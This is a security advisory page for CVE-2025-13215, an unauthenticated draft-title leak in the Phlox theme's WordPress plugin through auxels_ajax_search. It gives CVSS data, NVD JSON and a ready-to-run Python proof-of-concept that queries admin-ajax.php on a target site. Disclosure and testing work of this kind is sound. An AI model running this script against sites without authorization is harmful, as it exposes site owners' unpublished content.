Security Vulnerability Report
CVE-2025-13215 CVSS 5.3 MEDIUM

CVE-2025-13215

Published: 2026-01-06 07:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.17.13 via the auxels_ajax_search due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract titles of draft posts that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Shortcodes and extra features for Phlox theme plugin (auxin-elements) < 2.17.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13215 PoC - Information Disclosure in Phlox theme plugin
# Target: WordPress site with Phlox theme plugin < 2.17.14


def exploit_cve_2025_13215(target_url):
    """
    Exploit information disclosure vulnerability in auxels_ajax_search

    This PoC demonstrates how an unauthenticated attacker can extract
    draft/private post titles that should not be accessible.
    """
    # Target endpoint for AJAX requests
    ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Construct search query to trigger auxels_ajax_search
    params = {
        'action': 'auxels_ajax_search',
        'term': '',           # Empty or specific term to search
        'post_type': 'post',  # Can be modified to target other post types
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Exploiting endpoint: {ajax_endpoint}")
    print("[*] Sending request to auxels_ajax_search...")

    try:
        # Send unauthenticated request
        response = requests.get(ajax_endpoint, params=params, timeout=10)

        if response.status_code == 200:
            print(f"[+] Response received (Status: {response.status_code})")
            print("[*] Response content:")
            print(response.text[:500])  # Print first 500 chars

            # Check if response contains post titles that should be protected
            if 'id:' in response.text or 'title:' in response.text:
                print("[!] VULNERABLE: Protected post information exposed!")
                return True
            else:
                print("[-] No obvious information disclosure detected")
                return False
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13215.py <target_url>")
        print("Example: python cve-2025-13215.py http://target.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_cve_2025_13215(target)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13215",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-06T07:15:42.663",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.17.13 via the auxels_ajax_search due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract titles of draft posts that they should not have access to."
      },
      {
        "lang": "es",
        "value": "El plugin Shortcodes and extra features for Phlox theme para WordPress es vulnerable a la Exposición de Información en todas las versiones hasta la 2.17.13, inclusive, a través de auxels_ajax_search debido a restricciones insuficientes sobre qué publicaciones pueden incluirse. Esto hace posible que atacantes no autenticados extraigan títulos de publicaciones en borrador a las que no deberían tener acceso."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/public/includes/frontend-ajax.php#L348",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f47ab91-7d91-4231-91ef-66c556ad8496?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```